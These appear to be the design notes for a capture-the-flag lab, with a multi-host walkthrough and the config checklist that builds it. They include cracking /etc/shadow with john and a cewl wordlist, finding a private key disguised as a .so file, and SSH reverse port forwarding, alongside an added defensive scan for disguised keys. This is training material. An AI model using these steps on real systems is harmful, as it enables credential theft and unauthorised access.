gotty > student@c2t2-000-bchd

 STEPS:
 0. find a throwaway flag (first)
    grep COG *.txt
 1. find port 1863 (use ss or netstat to spot outbound ssh connections on that port)
    - watch -n1 -d ss -antp
    - tcpdump -i ens3 not port 2222 and ip
 2. run john on the etc passwd to get the axel user's password
    "There sure are a lot of WORDS in this book. Make sure to not PASS your eyes over all of them"
    - make a wordlist from heimskringla.txt
      sudo apt install cewl john
      python -m SimpleHTTPServer &
      cewl localhost:8000/heimskringla.txt -w words
      sudo john --wordlist=words /etc/shadow
      # HINT: only do the hash you want (avoid 656000 rounds on the student user)
 3. find the hostname crust
    nslookup <IP from ss -ant>
 4. ssh to axel@c2t2-000-crust -p 1863

axel@crust

 STEPS:
 1. find the PEM private key file buried on the crust server
    find / -type f 2>/dev/null | grep ".so$" | xargs -I {} -P0 file {} | egrep -v "ELF|ASCII|python|terminfo"
    ssh-keygen -l -f <FILE>
 2. watch the syslog that is running on crust
    a. cat flag into the log every 5 min (cron?) -> key is there and also failed attempts to connect to port
 3. use that key to get to lindenbrock@mantle -> no bash just a key
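
A defensive counterpart to the search in step 1, as an added example that is not part of the original notes: a scan that reports files named `*.so` that are not ELF objects yet contain a PEM private-key header. The function name `find_disguised_keys` is hypothetical, and it checks the ELF magic bytes directly instead of calling `file`.

```shell
#!/bin/sh
# Added example (not from the original notes).
# find_disguised_keys DIR
#   Prints, one per line, every regular file under DIR that
#     - is named *.so,
#     - does NOT start with the ELF magic 0x7f 'E' 'L' 'F', and
#     - contains a PEM private-key header.
#   Genuine ELF libraries are skipped on purpose: crypto libraries embed
#   the header string as a constant and would be false positives.
find_disguised_keys() {
    find "$1" -xdev -type f -name '*.so' -exec sh -c '
        for f do
            # First four bytes as hex, e.g. "7f454c46" for a real shared object.
            magic=$(od -An -tx1 -N4 "$f" | tr -d " \n")
            if [ "$magic" = "7f454c46" ]; then
                continue
            fi
            # Matches RSA / EC / OPENSSH / ENCRYPTED / PKCS#8 private-key headers.
            if grep -aqE -e "-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----" "$f"; then
                printf "%s\n" "$f"
            fi
        done
    ' sh {} +
}
```

Run it as `find_disguised_keys /usr/lib` from a shell that has sourced the function; any hit is key material stored under a misleading name and is worth rotating and investigating.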

lindenbrock@mantle

 STEPS:
 0. no shell here -- But GatewayPorts yes
 1. port forward 1337 reverse to netcat to receive a flag and a clue for how to get to core (BONUS wireguard?)
    ssh lindenbrock@c2t2-001-mantle -i /usr/lib/x86_64-linux-gnu/coreutils/libstdkey.so -NT -R 0.0.0.0:1337:localhost:1337 -v
 3. Forward tunnel to core

stromboli@core

 STEPS:
 0. play game

CONFIG Changes:

 bchd:
 - <x> Add axel user to bchd with an easily john'd password
 - <x> FLAG: /bin/nope for axel's shell
 - <x> CLUE_FILE: Norse book with axel@crust password and flag in it
 - <x> outbound cron job sshing to crust

 crust:
 - <~> ssh port 1862 on crust
 - <x> Disable student ssh login with echo shell
 - <x> FLAG FILE: pem is somewhere on this machine - flag in it
 - <x> rsyslog server

 mantle:
 - <x> lindenbrock public key auth
 - <x> rsyslog client
 - < > sshd GatewayPorts yes

 core:
 - < > netcat cron job to mantle port 1337

BONUS:

change MOTD on all servers
fake logs into crust rsyslog